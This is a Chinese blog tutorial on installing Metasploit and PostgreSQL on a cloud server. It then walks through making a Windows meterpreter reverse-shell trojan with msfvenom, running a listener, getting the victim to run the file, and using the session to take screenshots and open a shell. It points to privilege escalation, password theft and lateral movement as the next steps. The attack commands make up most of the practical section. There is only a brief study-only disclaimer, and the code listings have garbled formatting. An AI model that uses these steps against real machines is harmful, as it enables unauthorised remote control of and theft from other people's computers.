在校园网环境下,由于各种限制,会导致本机虚拟机网络出现各种问题,解决起来非常繁琐,为此可以在服务器上安装MSF
1. 安装MFS
用xshell等工具连接你的服务器,并使用
1
ifconfig
1
|
ifconfig
|
查看你的ip地址并记下来
接下来的命令
1
2 3 4 5 6 7 8 |
// 切换目录
cd /home // 获取MSF安装脚本 curl https: //raw.githubusercontent.com /rapid7 /metasploit-omnibus /master /config /templates /metasploit-framework-wrappers /msfupdate.erb > msfinstall // 修改权限 chmod 755 msfinstall // 开始安装 . /msfinstall |
2. 安装postgresql
因为MSF需要记录一些数据,依赖于postgresql,因此还需要安装
同样在当前home目录下
1
2 3 4 5 6 7 8 9 10 11 12 |
// 安装postgresql
apt-get install postgresql // 切换到postgres用户 su postgres // 登录postgresql数据库,首次登录没有密码 psql // 修改数据库用户postgres的密码 \password postgres // 退出 \q // 初始化 msfdb init |
3. MSF实战
1
2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 |
// 生成小马文件
msfvenom -p windows /meterpreter /reverse_tcp LHOST=服务器IP LPORT=服务器监听端口 -f exe -o test.exe // 进入msf msfconsole // 监听 use exploit /multi /handler // 设置payload set payload windows /meterpreter /reverse_tcp // 设置 set LHOST 0.0.0.0 set LPORT 服务器监听端口 // 运行 run [ cc ] <h3 >接下来的就是将木马文件传给靶机运行就行了 </h3 > <h2 >获取服务端会话后可进行的一些操作 </h2 > [ cc lang= "bash" ] // 将会话维持 background // 罗列会话 sessions // 进入会话 sesions 会话 id // 获取目标主机屏幕截图 screenshot // 进入目标主机的Shell shell // 退出shell exit // 更多内容可以通过帮助查看 help |
后续就是提权、抓密码、横向渗透的事情了,可以自由发挥
行云博客 - 免责申明
本站提供的一切软件、教程和内容信息仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负。本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我(admin@xy586.top)联系处理。敬请谅解!
本文链接:https://www.xy586.top/235.html
转载请注明文章来源:行云博客 » 云服务器如何安装MFS环境